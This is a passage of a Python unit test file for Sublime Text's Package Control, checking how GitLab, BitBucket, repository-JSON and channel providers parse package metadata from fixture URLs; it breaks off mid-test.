class GitLabRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def gitlab_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
}
def test_match_url(self):
self.assertEqual(
True,
GitLabRepositoryProvider.match_url('https://gitlab.com/packagecontrol-test/package_control-tester')
)
self.assertEqual(
True,
GitLabRepositoryProvider.match_url(
'https://gitlab.com/packagecontrol-test/package_control-tester/-/tree/master'
)
)
self.assertEqual(
False,
GitLabRepositoryProvider.match_url('https://gitlab.com/packagecontrol-test')
)
def test_get_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://gitlab.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
                'readme': 'https://gitlab.com/packagecontrol-test/'
                          'package_control-tester/-/raw/master/readme.md',
'issues': None,
'donate': None,
'buy': None,
'sources': ['https://gitlab.com/packagecontrol-test/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': '2020-07-15 10:50:38',
'version': '2020.07.15.10.50.38',
'url': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/archive/master/'
'package_control-tester-master.zip',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': '2020-07-15 10:50:38'
}
)],
packages
)
def test_get_sources(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(
['https://gitlab.com/packagecontrol-test/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class GitLabUserProviderTests(unittest.TestCase):
maxDiff = None
def gitlab_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
}
def test_match_url(self):
self.assertEqual(
True,
GitLabUserProvider.match_url('https://gitlab.com/packagecontrol-test')
)
self.assertEqual(
False,
GitLabUserProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitLabUserProvider.match_url('https://bitbucket.org/packagecontrol')
)
def test_get_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://gitlab.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/raw/master/readme.md',
'issues': None,
'donate': None,
'buy': None,
'sources': ['https://gitlab.com/packagecontrol-test'],
'labels': [],
'previous_names': [],
'releases': [{
'sublime_text': '*',
'date': '2020-07-15 10:50:38',
'version': '2020.07.15.10.50.38',
'platforms': ['*'],
'url': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/archive/master/package_control-tester-master.zip'
}],
'last_modified': '2020-07-15 10:50:38'
}
)],
packages
)
def test_get_sources(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(['https://gitlab.com/packagecontrol-test'], provider.get_sources())
def test_get_renamed_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class BitBucketRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def bitbucket_settings(self):
return {
'debug': True,
'cache': HttpCache(604800)
}
def test_match_url(self):
self.assertEqual(
True,
BitBucketRepositoryProvider.match_url('https://bitbucket.org/wbond/package_control-tester')
)
self.assertEqual(
False,
BitBucketRepositoryProvider.match_url('https://bitbucket.org/wbond')
)
self.assertEqual(
False,
BitBucketRepositoryProvider.match_url('https://github.com/wbond/package_control-tester')
)
def test_get_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://bitbucket.org/wbond/package_control-tester',
'author': 'wbond',
'readme': 'https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md',
'issues': 'https://bitbucket.org/wbond/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://bitbucket.org/wbond/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://bitbucket.org/wbond/package_control-tester/get/master.zip',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(
['https://bitbucket.org/wbond/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
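# RepositoryProviderTests below walk the repository JSON schema versions
# (1.0, 1.2, 2.0 and 3.0.0). The fixtures demonstrate two things: release
# details may be delegated to GitHub/BitBucket (the "*_details" 2.0 and
# "*_releases" 3.0.0 variants), and only the 3.0.0 schema introduces
# dependencies, which is why get_dependencies() yields entries solely for
# the repository-3.0.0-explicit.json fixture.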
class RepositoryProviderTests(unittest.TestCase):
maxDiff = None
def settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_get_packages_10(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-1.0',
{
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json'
],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_10(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_12(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-1.2',
{
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_12(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_20_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0',
{
"name": "package_control-tester-2.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-explicit.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_20(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_20_github(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-github_details.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0-gh',
{
"name": "package_control-tester-2.0-gh",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-github_details.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_packages_20_bitbucket(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-bitbucket_details.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0-bb',
{
"name": "package_control-tester-2.0-bb",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-bitbucket_details.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_packages_300_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-3.0.0',
{
"name": "package_control-tester-3.0.0",
"author": ["packagecontrol", "wbond"],
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": "https://gratipay.com/wbond/",
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"],
"dependencies": ["bz2"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_300_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual(
[
(
'bz2',
{
"name": "bz2",
"load_order": "02",
"author": "wbond",
"description": "Python bz2 module",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "https://packagecontrol.io/bz2.sublime-package",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'ssl-linux',
{
"name": "ssl-linux",
"load_order": "01",
"description": "Python _ssl module for Linux",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-linux.sublime-package",
"sublime_text": "*",
"platforms": ["linux"],
"sha256": "d12a2ca2843b3c06a834652e9827a29f88872bb31bd64230775f3dbe12e0ebd4"
}
]
}
),
(
'ssl-windows',
{
"name": "ssl-windows",
"load_order": "01",
"description": "Python _ssl module for Sublime Text 2 on Windows",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-windows.sublime-package",
"sublime_text": "<3000",
"platforms": ["windows"],
"sha256": "efe25e3bdf2e8f791d86327978aabe093c9597a6ceb8c2fb5438c1d810e02bea"
}
]
}
)
],
dependencies
)
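    # A note on the dependency fixtures above: the releases served over
    # plain http carry a "sha256" field (presumably so the download can be
    # verified without TLS), while the https bz2 release omits it, and
    # "load_order" appears to set the order in which dependencies are
    # loaded ("01" before "02").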
def test_get_packages_300_github(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[
(
'package_control-tester-3.0.0-gh-tags',
{
"name": "package_control-tester-3.0.0-gh-tags",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-tags_base',
{
"name": "package_control-tester-3.0.0-gh-tags_base",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-tags_prefix',
{
"name": "package_control-tester-3.0.0-gh-tags_prefix",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/win-1.0.2",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-branch',
{
"name": "package_control-tester-3.0.0-gh-branch",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": LAST_COMMIT_TIMESTAMP,
"releases": [
{
"version": LAST_COMMIT_VERSION,
"date": LAST_COMMIT_TIMESTAMP,
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/master",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
)
],
packages
)
def test_get_packages_300_bitbucket(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[
(
'package_control-tester-3.0.0-bb-tags',
{
"name": "package_control-tester-3.0.0-bb-tags",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-bb-tags_prefix',
{
"name": "package_control-tester-3.0.0-bb-tags_prefix",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/win-1.0.2.zip",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
}
),
(
'package_control-tester-3.0.0-bb-branch',
{
"name": "package_control-tester-3.0.0-bb-branch",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": LAST_COMMIT_TIMESTAMP,
"releases": [
{
"version": LAST_COMMIT_VERSION,
"date": LAST_COMMIT_TIMESTAMP,
"url": "https://bitbucket.org/wbond/package_control-tester/get/master.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
)
],
packages
)
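# ChannelProviderTests below cover channels, which aggregate repositories:
# get_repositories()/get_sources() return the repository URLs a channel
# lists, while get_packages() takes one of those URLs and returns that
# repository's package data as recorded in the channel file. A minimal
# sketch, assuming a channel URL like the fixtures below and a settings
# dict like the one returned by settings():
#
#     provider = ChannelProvider(channel_url, settings)
#     for repo_url in provider.get_repositories():
#         packages = provider.get_packages(repo_url)  # dict: name -> info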
class ChannelProviderTests(unittest.TestCase):
maxDiff = None
def settings(self):
return {
'debug': True,
'cache': HttpCache(604800)
}
def test_get_name_map_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)
def test_get_renamed_packages_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)
def test_get_repositories_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
],
provider.get_repositories()
)
def test_get_sources_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
],
provider.get_sources()
)
def test_get_packages_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-1.0": {
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
